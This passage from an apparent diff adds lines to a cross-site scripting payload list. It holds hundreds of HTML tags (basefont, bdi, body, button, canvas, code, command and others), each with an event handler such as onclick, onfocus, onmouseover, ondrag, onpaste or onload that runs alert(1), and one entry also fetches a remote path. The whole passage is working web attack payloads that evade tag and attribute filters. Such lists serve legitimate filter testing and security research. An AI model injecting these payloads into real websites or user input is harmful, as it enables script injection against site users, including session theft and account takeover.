onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus> +<basefont onkeydown="alert(1)" contenteditable>test</basefont> +<basefont onkeypress="alert(1)" contenteditable>test</basefont> +<basefont onkeyup="alert(1)" contenteditable>test</basefont> +<basefont onmousedown="alert(1)">test</basefont> +<basefont onmouseenter="alert(1)">test</basefont> +<basefont onmouseleave="alert(1)">test</basefont> +<basefont onmousemove="alert(1)">test</basefont> +<basefont onmouseout="alert(1)">test</basefont> +<basefont onmouseover="alert(1)">test</basefont> +<basefont onmouseup="alert(1)">test</basefont> +<basefont onpaste="alert(1)" contenteditable>test</basefont> +<bdi draggable="true" ondrag="alert(1)">test</bdi> +<bdi draggable="true" ondragend="alert(1)">test</bdi> +<bdi draggable="true" ondragenter="alert(1)">test</bdi> +<bdi draggable="true" ondragleave="alert(1)">test</bdi> +<bdi draggable="true" ondragstart="alert(1)">test</bdi> +<bdi id=x tabindex=1 onactivate=alert(1)></bdi> +<bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi> +<bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus> +<bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus> +<bdi id=x tabindex=1 onfocus=alert(1)></bdi> +<bdi id=x tabindex=1 onfocusin=alert(1)></bdi> +<bdi onbeforecopy="alert(1)" contenteditable>test</bdi> +<bdi onbeforecut="alert(1)" contenteditable>test</bdi> +<bdi onbeforepaste="alert(1)" contenteditable>test</bdi> +<bdi onblur=alert(1) tabindex=1 id=x></bdi><input autofocus> +<bdi onclick="alert(1)">test</bdi> +<bdi oncontextmenu="alert(1)">test</bdi> +<bdi oncopy="alert(1)" contenteditable>test</bdi> +<bdi oncut="alert(1)" contenteditable>test</bdi> +<bdi ondblclick="alert(1)">test</bdi> +<bdi onfocusout=alert(1) tabindex=1 id=x></bdi><input autofocus> +<bdi onkeydown="alert(1)" contenteditable>test</bdi> +<bdi onkeypress="alert(1)" contenteditable>test</bdi> +<bdi onkeyup="alert(1)" contenteditable>test</bdi> +<bdi 
onmousedown="alert(1)">test</bdi> +<bdi onmouseenter="alert(1)">test</bdi> +<bdi onmouseleave="alert(1)">test</bdi> +<bdi onmousemove="alert(1)">test</bdi> +<bdi onmouseout="alert(1)">test</bdi> +<bdi onmouseover="alert(1)">test</bdi> +<bdi onmouseup="alert(1)">test</bdi> +<bdi onpaste="alert(1)" contenteditable>test</bdi> +<bdo draggable="true" ondrag="alert(1)">test</bdo> +<bdo draggable="true" ondragend="alert(1)">test</bdo> +<bdo draggable="true" ondragenter="alert(1)">test</bdo> +<bdo draggable="true" ondragleave="alert(1)">test</bdo> +<bdo draggable="true" ondragstart="alert(1)">test</bdo> +<bdo id=x tabindex=1 onactivate=alert(1)></bdo> +<bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo> +<bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus> +<bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus> +<bdo id=x tabindex=1 onfocus=alert(1)></bdo> +<bdo id=x tabindex=1 onfocusin=alert(1)></bdo> +<bdo onbeforecopy="alert(1)" contenteditable>test</bdo> +<bdo onbeforecut="alert(1)" contenteditable>test</bdo> +<bdo onbeforepaste="alert(1)" contenteditable>test</bdo> +<bdo onblur=alert(1) tabindex=1 id=x></bdo><input autofocus> +<bdo onclick="alert(1)">test</bdo> +<bdo oncontextmenu="alert(1)">test</bdo> +<bdo oncopy="alert(1)" contenteditable>test</bdo> +<bdo oncut="alert(1)" contenteditable>test</bdo> +<bdo ondblclick="alert(1)">test</bdo> +<bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus> +<bdo onkeydown="alert(1)" contenteditable>test</bdo> +<bdo onkeypress="alert(1)" contenteditable>test</bdo> +<bdo onkeyup="alert(1)" contenteditable>test</bdo> +<bdo onmousedown="alert(1)">test</bdo> +<bdo onmouseenter="alert(1)">test</bdo> +<bdo onmouseleave="alert(1)">test</bdo> +<bdo onmousemove="alert(1)">test</bdo> +<bdo onmouseout="alert(1)">test</bdo> +<bdo onmouseover="alert(1)">test</bdo> +<bdo onmouseup="alert(1)">test</bdo> +<bdo onpaste="alert(1)" contenteditable>test</bdo> +<bgsound draggable="true" 
ondrag="alert(1)">test</bgsound> +<bgsound draggable="true" ondragend="alert(1)">test</bgsound> +<bgsound draggable="true" ondragenter="alert(1)">test</bgsound> +<bgsound draggable="true" ondragleave="alert(1)">test</bgsound> +<bgsound draggable="true" ondragstart="alert(1)">test</bgsound> +<bgsound id=x tabindex=1 onactivate=alert(1)></bgsound> +<bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound> +<bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus> +<bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus> +<bgsound id=x tabindex=1 onfocus=alert(1)></bgsound> +<bgsound id=x tabindex=1 onfocusin=alert(1)></bgsound> +<bgsound onbeforecopy="alert(1)" contenteditable>test</bgsound> +<bgsound onbeforecut="alert(1)" contenteditable>test</bgsound> +<bgsound onbeforepaste="alert(1)" contenteditable>test</bgsound> +<bgsound onblur=alert(1) tabindex=1 id=x></bgsound><input autofocus> +<bgsound onclick="alert(1)">test</bgsound> +<bgsound oncontextmenu="alert(1)">test</bgsound> +<bgsound oncopy="alert(1)" contenteditable>test</bgsound> +<bgsound oncut="alert(1)" contenteditable>test</bgsound> +<bgsound ondblclick="alert(1)">test</bgsound> +<bgsound onfocusout=alert(1) tabindex=1 id=x></bgsound><input autofocus> +<bgsound onkeydown="alert(1)" contenteditable>test</bgsound> +<bgsound onkeypress="alert(1)" contenteditable>test</bgsound> +<bgsound onkeyup="alert(1)" contenteditable>test</bgsound> +<bgsound onmousedown="alert(1)">test</bgsound> +<bgsound onmouseenter="alert(1)">test</bgsound> +<bgsound onmouseleave="alert(1)">test</bgsound> +<bgsound onmousemove="alert(1)">test</bgsound> +<bgsound onmouseout="alert(1)">test</bgsound> +<bgsound onmouseover="alert(1)">test</bgsound> +<bgsound onmouseup="alert(1)">test</bgsound> +<bgsound onpaste="alert(1)" contenteditable>test</bgsound> +<big draggable="true" ondrag="alert(1)">test</big> +<big draggable="true" ondragend="alert(1)">test</big> +<big draggable="true" 
ondragenter="alert(1)">test</big> +<big draggable="true" ondragleave="alert(1)">test</big> +<big draggable="true" ondragstart="alert(1)">test</big> +<big id=x tabindex=1 onactivate=alert(1)></big> +<big id=x tabindex=1 onbeforeactivate=alert(1)></big> +<big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus> +<big id=x tabindex=1 ondeactivate=alert(1)></big><input id=y autofocus> +<big id=x tabindex=1 onfocus=alert(1)></big> +<big id=x tabindex=1 onfocusin=alert(1)></big> +<big onbeforecopy="alert(1)" contenteditable>test</big> +<big onbeforecut="alert(1)" contenteditable>test</big> +<big onbeforepaste="alert(1)" contenteditable>test</big> +<big onblur=alert(1) tabindex=1 id=x></big><input autofocus> +<big onclick="alert(1)">test</big> +<big oncontextmenu="alert(1)">test</big> +<big oncopy="alert(1)" contenteditable>test</big> +<big oncut="alert(1)" contenteditable>test</big> +<big ondblclick="alert(1)">test</big> +<big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus> +<big onkeydown="alert(1)" contenteditable>test</big> +<big onkeypress="alert(1)" contenteditable>test</big> +<big onkeyup="alert(1)" contenteditable>test</big> +<big onmousedown="alert(1)">test</big> +<big onmouseenter="alert(1)">test</big> +<big onmouseleave="alert(1)">test</big> +<big onmousemove="alert(1)">test</big> +<big onmouseout="alert(1)">test</big> +<big onmouseover="alert(1)">test</big> +<big onmouseup="alert(1)">test</big> +<big onpaste="alert(1)" contenteditable>test</big> +<blink draggable="true" ondrag="alert(1)">test</blink> +<blink draggable="true" ondragend="alert(1)">test</blink> +<blink draggable="true" ondragenter="alert(1)">test</blink> +<blink draggable="true" ondragleave="alert(1)">test</blink> +<blink draggable="true" ondragstart="alert(1)">test</blink> +<blink id=x tabindex=1 onactivate=alert(1)></blink> +<blink id=x tabindex=1 onbeforeactivate=alert(1)></blink> +<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus> +<blink 
id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus> +<blink id=x tabindex=1 onfocus=alert(1)></blink> +<blink id=x tabindex=1 onfocusin=alert(1)></blink> +<blink onbeforecopy="alert(1)" contenteditable>test</blink> +<blink onbeforecut="alert(1)" contenteditable>test</blink> +<blink onbeforepaste="alert(1)" contenteditable>test</blink> +<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus> +<blink onclick="alert(1)">test</blink> +<blink oncontextmenu="alert(1)">test</blink> +<blink oncopy="alert(1)" contenteditable>test</blink> +<blink oncut="alert(1)" contenteditable>test</blink> +<blink ondblclick="alert(1)">test</blink> +<blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus> +<blink onkeydown="alert(1)" contenteditable>test</blink> +<blink onkeypress="alert(1)" contenteditable>test</blink> +<blink onkeyup="alert(1)" contenteditable>test</blink> +<blink onmousedown="alert(1)">test</blink> +<blink onmouseenter="alert(1)">test</blink> +<blink onmouseleave="alert(1)">test</blink> +<blink onmousemove="alert(1)">test</blink> +<blink onmouseout="alert(1)">test</blink> +<blink onmouseover="alert(1)">test</blink> +<blink onmouseup="alert(1)">test</blink> +<blink onpaste="alert(1)" contenteditable>test</blink> +<blockquote draggable="true" ondrag="alert(1)">test</blockquote> +<blockquote draggable="true" ondragend="alert(1)">test</blockquote> +<blockquote draggable="true" ondragenter="alert(1)">test</blockquote> +<blockquote draggable="true" ondragleave="alert(1)">test</blockquote> +<blockquote draggable="true" ondragstart="alert(1)">test</blockquote> +<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote> +<blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote> +<blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus> +<blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus> +<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote> +<blockquote id=x 
tabindex=1 onfocusin=alert(1)></blockquote> +<blockquote onbeforecopy="alert(1)" contenteditable>test</blockquote> +<blockquote onbeforecut="alert(1)" contenteditable>test</blockquote> +<blockquote onbeforepaste="alert(1)" contenteditable>test</blockquote> +<blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus> +<blockquote onclick="alert(1)">test</blockquote> +<blockquote oncontextmenu="alert(1)">test</blockquote> +<blockquote oncopy="alert(1)" contenteditable>test</blockquote> +<blockquote oncut="alert(1)" contenteditable>test</blockquote> +<blockquote ondblclick="alert(1)">test</blockquote> +<blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus> +<blockquote onkeydown="alert(1)" contenteditable>test</blockquote> +<blockquote onkeypress="alert(1)" contenteditable>test</blockquote> +<blockquote onkeyup="alert(1)" contenteditable>test</blockquote> +<blockquote onmousedown="alert(1)">test</blockquote> +<blockquote onmouseenter="alert(1)">test</blockquote> +<blockquote onmouseleave="alert(1)">test</blockquote> +<blockquote onmousemove="alert(1)">test</blockquote> +<blockquote onmouseout="alert(1)">test</blockquote> +<blockquote onmouseover="alert(1)">test</blockquote> +<blockquote onmouseup="alert(1)">test</blockquote> +<blockquote onpaste="alert(1)" contenteditable>test</blockquote> +<body draggable="true" ondrag="alert(1)">test</body> +<body draggable="true" ondragend="alert(1)">test</body> +<body draggable="true" ondragenter="alert(1)">test</body> +<body draggable="true" ondragleave="alert(1)">test</body> +<body draggable="true" ondragstart="alert(1)">test</body> +<body id=x tabindex=1 onactivate=alert(1)></body> +<body id=x tabindex=1 onbeforeactivate=alert(1)></body> +<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus> +<body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus> +<body id=x tabindex=1 onfocus=alert(1)></body> +<body id=x tabindex=1 onfocusin=alert(1)></body> +<body 
onafterprint=alert(1)> +<body onbeforecopy="alert(1)" contenteditable>test</body> +<body onbeforecut="alert(1)" contenteditable>test</body> +<body onbeforepaste="alert(1)" contenteditable>test</body> +<body onbeforeprint=alert(1)> +<body onbeforeunload="location='javascript:alert(1)'"> +<body onblur=alert(1) id=x><iframe id=x> +<body onclick="alert(1)">test</body> +<body oncontextmenu="alert(1)">test</body> +<body oncopy="alert(1)" contenteditable>test</body> +<body oncut="alert(1)" contenteditable>test</body> +<body ondblclick="alert(1)">test</body> +<body onerror=alert(1) onload=/> +<body onfocusout=alert(1) id=x><iframe id=x> +<body onhashchange="alert(1)"> +<body onkeydown="alert(1)" contenteditable>test</body> +<body onkeypress="alert(1)" contenteditable>test</body> +<body onkeyup="alert(1)" contenteditable>test</body> +<body onload=alert(1)> +<body onmessage=alert(1)> +<body onmousedown="alert(1)">test</body> +<body onmouseenter="alert(1)">test</body> +<body onmouseleave="alert(1)">test</body> +<body onmousemove="alert(1)">test</body> +<body onmouseout="alert(1)">test</body> +<body onmouseover="alert(1)">test</body> +<body onmouseup="alert(1)">test</body> +<body onpageshow=alert(1)> +<body onpaste="alert(1)" contenteditable>test</body> +<body onpopstate=alert(1)> +<body onresize="alert(1)"> +<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div> +<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script> +<body onwheel=alert(1)> +<br draggable="true" ondrag="alert(1)">test</br> +<br draggable="true" ondragend="alert(1)">test</br> +<br draggable="true" ondragenter="alert(1)">test</br> +<br draggable="true" ondragleave="alert(1)">test</br> +<br draggable="true" ondragstart="alert(1)">test</br> +<br id=x tabindex=1 onactivate=alert(1)></br> +<br id=x tabindex=1 onbeforeactivate=alert(1)></br> +<br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus> +<br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus> 
+<br id=x tabindex=1 onfocus=alert(1)></br> +<br id=x tabindex=1 onfocusin=alert(1)></br> +<br onbeforecopy="alert(1)" contenteditable>test</br> +<br onbeforecut="alert(1)" contenteditable>test</br> +<br onbeforepaste="alert(1)" contenteditable>test</br> +<br onblur=alert(1) tabindex=1 id=x></br><input autofocus> +<br onclick="alert(1)">test</br> +<br oncontextmenu="alert(1)">test</br> +<br oncopy="alert(1)" contenteditable>test</br> +<br oncut="alert(1)" contenteditable>test</br> +<br ondblclick="alert(1)">test</br> +<br onfocusout=alert(1) tabindex=1 id=x></br><input autofocus> +<br onkeydown="alert(1)" contenteditable>test</br> +<br onkeypress="alert(1)" contenteditable>test</br> +<br onkeyup="alert(1)" contenteditable>test</br> +<br onmousedown="alert(1)">test</br> +<br onmouseenter="alert(1)">test</br> +<br onmouseleave="alert(1)">test</br> +<br onmousemove="alert(1)">test</br> +<br onmouseout="alert(1)">test</br> +<br onmouseover="alert(1)">test</br> +<br onmouseup="alert(1)">test</br> +<br onpaste="alert(1)" contenteditable>test</br> +<button autofocus onfocus=alert(1)>test</button> +<button autofocus onfocusin=alert(1)>test</button> +<button draggable="true" ondrag="alert(1)">test</button> +<button draggable="true" ondragend="alert(1)">test</button> +<button draggable="true" ondragenter="alert(1)">test</button> +<button draggable="true" ondragleave="alert(1)">test</button> +<button draggable="true" ondragstart="alert(1)">test</button> +<button id=x tabindex=1 onactivate=alert(1)></button> +<button id=x tabindex=1 onbeforeactivate=alert(1)></button> +<button id=x tabindex=1 onbeforedeactivate=alert(1)></button><input autofocus> +<button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus> +<button onbeforecopy="alert(1)" contenteditable>test</button> +<button onbeforecut="alert(1)" contenteditable>test</button> +<button onbeforepaste="alert(1)" contenteditable>test</button> +<button onblur=alert(1) id=x></button><input autofocus> +<button 
onclick="alert(1)">test</button> +<button oncontextmenu="alert(1)">test</button> +<button oncopy="alert(1)" contenteditable>test</button> +<button oncut="alert(1)" contenteditable>test</button> +<button ondblclick="alert(1)">test</button> +<button onfocusout=alert(1) id=x></button><input autofocus> +<button onkeydown="alert(1)" contenteditable>test</button> +<button onkeypress="alert(1)" contenteditable>test</button> +<button onkeyup="alert(1)" contenteditable>test</button> +<button onmousedown="alert(1)">test</button> +<button onmouseenter="alert(1)">test</button> +<button onmouseleave="alert(1)">test</button> +<button onmousemove="alert(1)">test</button> +<button onmouseout="alert(1)">test</button> +<button onmouseover="alert(1)">test</button> +<button onmouseup="alert(1)">test</button> +<button onpaste="alert(1)" contenteditable>test</button> +<canvas draggable="true" ondrag="alert(1)">test</canvas> +<canvas draggable="true" ondragend="alert(1)">test</canvas> +<canvas draggable="true" ondragenter="alert(1)">test</canvas> +<canvas draggable="true" ondragleave="alert(1)">test</canvas> +<canvas draggable="true" ondragstart="alert(1)">test</canvas> +<canvas id=x tabindex=1 onactivate=alert(1)></canvas> +<canvas id=x tabindex=1 onbeforeactivate=alert(1)></canvas> +<canvas id=x tabindex=1 onbeforedeactivate=alert(1)></canvas><input autofocus> +<canvas id=x tabindex=1 ondeactivate=alert(1)></canvas><input id=y autofocus> +<canvas id=x tabindex=1 onfocus=alert(1)></canvas> +<canvas id=x tabindex=1 onfocusin=alert(1)></canvas> +<canvas onbeforecopy="alert(1)" contenteditable>test</canvas> +<canvas onbeforecut="alert(1)" contenteditable>test</canvas> +<canvas onbeforepaste="alert(1)" contenteditable>test</canvas> +<canvas onblur=alert(1) tabindex=1 id=x></canvas><input autofocus> +<canvas onclick="alert(1)">test</canvas> +<canvas oncontextmenu="alert(1)">test</canvas> +<canvas oncopy="alert(1)" contenteditable>test</canvas> +<canvas oncut="alert(1)" 
contenteditable>test</canvas> +<canvas ondblclick="alert(1)">test</canvas> +<canvas onfocusout=alert(1) tabindex=1 id=x></canvas><input autofocus> +<canvas onkeydown="alert(1)" contenteditable>test</canvas> +<canvas onkeypress="alert(1)" contenteditable>test</canvas> +<canvas onkeyup="alert(1)" contenteditable>test</canvas> +<canvas onmousedown="alert(1)">test</canvas> +<canvas onmouseenter="alert(1)">test</canvas> +<canvas onmouseleave="alert(1)">test</canvas> +<canvas onmousemove="alert(1)">test</canvas> +<canvas onmouseout="alert(1)">test</canvas> +<canvas onmouseover="alert(1)">test</canvas> +<canvas onmouseup="alert(1)">test</canvas> +<canvas onpaste="alert(1)" contenteditable>test</canvas> +<caption draggable="true" ondrag="alert(1)">test</caption> +<caption draggable="true" ondragend="alert(1)">test</caption> +<caption draggable="true" ondragenter="alert(1)">test</caption> +<caption draggable="true" ondragleave="alert(1)">test</caption> +<caption draggable="true" ondragstart="alert(1)">test</caption> +<caption id=x tabindex=1 onactivate=alert(1)></caption> +<caption id=x tabindex=1 onbeforeactivate=alert(1)></caption> +<caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus> +<caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus> +<caption id=x tabindex=1 onfocus=alert(1)></caption> +<caption id=x tabindex=1 onfocusin=alert(1)></caption> +<caption onbeforecopy="alert(1)" contenteditable>test</caption> +<caption onbeforecut="alert(1)" contenteditable>test</caption> +<caption onbeforepaste="alert(1)" contenteditable>test</caption> +<caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus> +<caption onclick="alert(1)">test</caption> +<caption oncontextmenu="alert(1)">test</caption> +<caption oncopy="alert(1)" contenteditable>test</caption> +<caption oncut="alert(1)" contenteditable>test</caption> +<caption ondblclick="alert(1)">test</caption> +<caption onfocusout=alert(1) tabindex=1 
id=x></caption><input autofocus> +<caption onkeydown="alert(1)" contenteditable>test</caption> +<caption onkeypress="alert(1)" contenteditable>test</caption> +<caption onkeyup="alert(1)" contenteditable>test</caption> +<caption onmousedown="alert(1)">test</caption> +<caption onmouseenter="alert(1)">test</caption> +<caption onmouseleave="alert(1)">test</caption> +<caption onmousemove="alert(1)">test</caption> +<caption onmouseout="alert(1)">test</caption> +<caption onmouseover="alert(1)">test</caption> +<caption onmouseup="alert(1)">test</caption> +<caption onpaste="alert(1)" contenteditable>test</caption> +<center draggable="true" ondrag="alert(1)">test</center> +<center draggable="true" ondragend="alert(1)">test</center> +<center draggable="true" ondragenter="alert(1)">test</center> +<center draggable="true" ondragleave="alert(1)">test</center> +<center draggable="true" ondragstart="alert(1)">test</center> +<center id=x tabindex=1 onactivate=alert(1)></center> +<center id=x tabindex=1 onbeforeactivate=alert(1)></center> +<center id=x tabindex=1 onbeforedeactivate=alert(1)></center><input autofocus> +<center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus> +<center id=x tabindex=1 onfocus=alert(1)></center> +<center id=x tabindex=1 onfocusin=alert(1)></center> +<center onbeforecopy="alert(1)" contenteditable>test</center> +<center onbeforecut="alert(1)" contenteditable>test</center> +<center onbeforepaste="alert(1)" contenteditable>test</center> +<center onblur=alert(1) tabindex=1 id=x></center><input autofocus> +<center onclick="alert(1)">test</center> +<center oncontextmenu="alert(1)">test</center> +<center oncopy="alert(1)" contenteditable>test</center> +<center oncut="alert(1)" contenteditable>test</center> +<center ondblclick="alert(1)">test</center> +<center onfocusout=alert(1) tabindex=1 id=x></center><input autofocus> +<center onkeydown="alert(1)" contenteditable>test</center> +<center onkeypress="alert(1)" contenteditable>test</center> 
+<center onkeyup="alert(1)" contenteditable>test</center> +<center onmousedown="alert(1)">test</center> +<center onmouseenter="alert(1)">test</center> +<center onmouseleave="alert(1)">test</center> +<center onmousemove="alert(1)">test</center> +<center onmouseout="alert(1)">test</center> +<center onmouseover="alert(1)">test</center> +<center onmouseup="alert(1)">test</center> +<center onpaste="alert(1)" contenteditable>test</center> +<cite draggable="true" ondrag="alert(1)">test</cite> +<cite draggable="true" ondragend="alert(1)">test</cite> +<cite draggable="true" ondragenter="alert(1)">test</cite> +<cite draggable="true" ondragleave="alert(1)">test</cite> +<cite draggable="true" ondragstart="alert(1)">test</cite> +<cite id=x tabindex=1 onactivate=alert(1)></cite> +<cite id=x tabindex=1 onbeforeactivate=alert(1)></cite> +<cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus> +<cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus> +<cite id=x tabindex=1 onfocus=alert(1)></cite> +<cite id=x tabindex=1 onfocusin=alert(1)></cite> +<cite onbeforecopy="alert(1)" contenteditable>test</cite> +<cite onbeforecut="alert(1)" contenteditable>test</cite> +<cite onbeforepaste="alert(1)" contenteditable>test</cite> +<cite onblur=alert(1) tabindex=1 id=x></cite><input autofocus> +<cite onclick="alert(1)">test</cite> +<cite oncontextmenu="alert(1)">test</cite> +<cite oncopy="alert(1)" contenteditable>test</cite> +<cite oncut="alert(1)" contenteditable>test</cite> +<cite ondblclick="alert(1)">test</cite> +<cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus> +<cite onkeydown="alert(1)" contenteditable>test</cite> +<cite onkeypress="alert(1)" contenteditable>test</cite> +<cite onkeyup="alert(1)" contenteditable>test</cite> +<cite onmousedown="alert(1)">test</cite> +<cite onmouseenter="alert(1)">test</cite> +<cite onmouseleave="alert(1)">test</cite> +<cite onmousemove="alert(1)">test</cite> +<cite onmouseout="alert(1)">test</cite> 
+<cite onmouseover="alert(1)">test</cite> +<cite onmouseup="alert(1)">test</cite> +<cite onpaste="alert(1)" contenteditable>test</cite> +<code draggable="true" ondrag="alert(1)">test</code> +<code draggable="true" ondragend="alert(1)">test</code> +<code draggable="true" ondragenter="alert(1)">test</code> +<code draggable="true" ondragleave="alert(1)">test</code> +<code draggable="true" ondragstart="alert(1)">test</code> +<code id=x tabindex=1 onactivate=alert(1)></code> +<code id=x tabindex=1 onbeforeactivate=alert(1)></code> +<code id=x tabindex=1 onbeforedeactivate=alert(1)></code><input autofocus> +<code id=x tabindex=1 ondeactivate=alert(1)></code><input id=y autofocus> +<code id=x tabindex=1 onfocus=alert(1)></code> +<code id=x tabindex=1 onfocusin=alert(1)></code> +<code onbeforecopy="alert(1)" contenteditable>test</code> +<code onbeforecut="alert(1)" contenteditable>test</code> +<code onbeforepaste="alert(1)" contenteditable>test</code> +<code onblur=alert(1) tabindex=1 id=x></code><input autofocus> +<code onclick="alert(1)">test</code> +<code oncontextmenu="alert(1)">test</code> +<code oncopy="alert(1)" contenteditable>test</code> +<code oncut="alert(1)" contenteditable>test</code> +<code ondblclick="alert(1)">test</code> +<code onfocusout=alert(1) tabindex=1 id=x></code><input autofocus> +<code onkeydown="alert(1)" contenteditable>test</code> +<code onkeypress="alert(1)" contenteditable>test</code> +<code onkeyup="alert(1)" contenteditable>test</code> +<code onmousedown="alert(1)">test</code> +<code onmouseenter="alert(1)">test</code> +<code onmouseleave="alert(1)">test</code> +<code onmousemove="alert(1)">test</code> +<code onmouseout="alert(1)">test</code> +<code onmouseover="alert(1)">test</code> +<code onmouseup="alert(1)">test</code> +<code onpaste="alert(1)" contenteditable>test</code> +<col draggable="true" ondrag="alert(1)">test</col> +<col draggable="true" ondragend="alert(1)">test</col> +<col draggable="true" ondragenter="alert(1)">test</col> 
+<col draggable="true" ondragleave="alert(1)">test</col> +<col draggable="true" ondragstart="alert(1)">test</col> +<col id=x tabindex=1 onactivate=alert(1)></col> +<col id=x tabindex=1 onbeforeactivate=alert(1)></col> +<col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus> +<col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus> +<col id=x tabindex=1 onfocus=alert(1)></col> +<col id=x tabindex=1 onfocusin=alert(1)></col> +<col onbeforecopy="alert(1)" contenteditable>test</col> +<col onbeforecut="alert(1)" contenteditable>test</col> +<col onbeforepaste="alert(1)" contenteditable>test</col> +<col onblur=alert(1) tabindex=1 id=x></col><input autofocus> +<col onclick="alert(1)">test</col> +<col oncontextmenu="alert(1)">test</col> +<col oncopy="alert(1)" contenteditable>test</col> +<col oncut="alert(1)" contenteditable>test</col> +<col ondblclick="alert(1)">test</col> +<col onfocusout=alert(1) tabindex=1 id=x></col><input autofocus> +<col onkeydown="alert(1)" contenteditable>test</col> +<col onkeypress="alert(1)" contenteditable>test</col> +<col onkeyup="alert(1)" contenteditable>test</col> +<col onmousedown="alert(1)">test</col> +<col onmouseenter="alert(1)">test</col> +<col onmouseleave="alert(1)">test</col> +<col onmousemove="alert(1)">test</col> +<col onmouseout="alert(1)">test</col> +<col onmouseover="alert(1)">test</col> +<col onmouseup="alert(1)">test</col> +<col onpaste="alert(1)" contenteditable>test</col> +<colgroup draggable="true" ondrag="alert(1)">test</colgroup> +<colgroup draggable="true" ondragend="alert(1)">test</colgroup> +<colgroup draggable="true" ondragenter="alert(1)">test</colgroup> +<colgroup draggable="true" ondragleave="alert(1)">test</colgroup> +<colgroup draggable="true" ondragstart="alert(1)">test</colgroup> +<colgroup id=x tabindex=1 onactivate=alert(1)></colgroup> +<colgroup id=x tabindex=1 onbeforeactivate=alert(1)></colgroup> +<colgroup id=x tabindex=1 onbeforedeactivate=alert(1)></colgroup><input 
autofocus> +<colgroup id=x tabindex=1 ondeactivate=alert(1)></colgroup><input id=y autofocus> +<colgroup id=x tabindex=1 onfocus=alert(1)></colgroup> +<colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup> +<colgroup onbeforecopy="alert(1)" contenteditable>test</colgroup> +<colgroup onbeforecut="alert(1)" contenteditable>test</colgroup> +<colgroup onbeforepaste="alert(1)" contenteditable>test</colgroup> +<colgroup onblur=alert(1) tabindex=1 id=x></colgroup><input autofocus> +<colgroup onclick="alert(1)">test</colgroup> +<colgroup oncontextmenu="alert(1)">test</colgroup> +<colgroup oncopy="alert(1)" contenteditable>test</colgroup> +<colgroup oncut="alert(1)" contenteditable>test</colgroup> +<colgroup ondblclick="alert(1)">test</colgroup> +<colgroup onfocusout=alert(1) tabindex=1 id=x></colgroup><input autofocus> +<colgroup onkeydown="alert(1)" contenteditable>test</colgroup> +<colgroup onkeypress="alert(1)" contenteditable>test</colgroup> +<colgroup onkeyup="alert(1)" contenteditable>test</colgroup> +<colgroup onmousedown="alert(1)">test</colgroup> +<colgroup onmouseenter="alert(1)">test</colgroup> +<colgroup onmouseleave="alert(1)">test</colgroup> +<colgroup onmousemove="alert(1)">test</colgroup> +<colgroup onmouseout="alert(1)">test</colgroup> +<colgroup onmouseover="alert(1)">test</colgroup> +<colgroup onmouseup="alert(1)">test</colgroup> +<colgroup onpaste="alert(1)" contenteditable>test</colgroup> +<command draggable="true" ondrag="alert(1)">test</command> +<command draggable="true" ondragend="alert(1)">test</command> +<command draggable="true" ondragenter="alert(1)">test</command> +<command draggable="true" ondragleave="alert(1)">test</command> +<command draggable="true" ondragstart="alert(1)">test</command> +<command id=x tabindex=1 onactivate=alert(1)></command> +<command id=x tabindex=1 onbeforeactivate=alert(1)></command> +<command id=x tabindex=1 onbeforedeactivate=alert(1)></command><input autofocus> +<command id=x tabindex=1 
ondeactivate=alert(1)></command><input id=y autofocus> +<command id=x tabindex=1 onfocus=alert(1)></command> +<command id=x tabindex=1 onfocusin=alert(1)></command> +<command onbeforecopy="alert(1)" contenteditable>test</command> +<command onbeforecut="alert(1)" contenteditable>test</command> +<command onbeforepaste="alert(1)" contenteditable>test</command> +<command onblur=alert(1) tabindex=1 id=x></command><input autofocus> +<command onclick="alert(1)">test</command> +<command oncontextmenu="alert(1)">test</command> +<command oncopy="alert(1)" contenteditable>test</command> +<command oncut="alert(1)" contenteditable>test</command> +<command ondblclick="alert(1)">test</command> +<command onfocusout=alert(1) tabindex=1 id=x></command><input autofocus> +<command onkeydown="alert(1)" contenteditable>test</command> +<command onkeypress="alert(1)" contenteditable>test</command> +<command onkeyup="alert(1)" contenteditable>test</command> +<command onmousedown="alert(1)">test</command> +<command onmouseenter="alert(1)">test</command> +<command onmouseleave="alert(1)">test</command> +<command 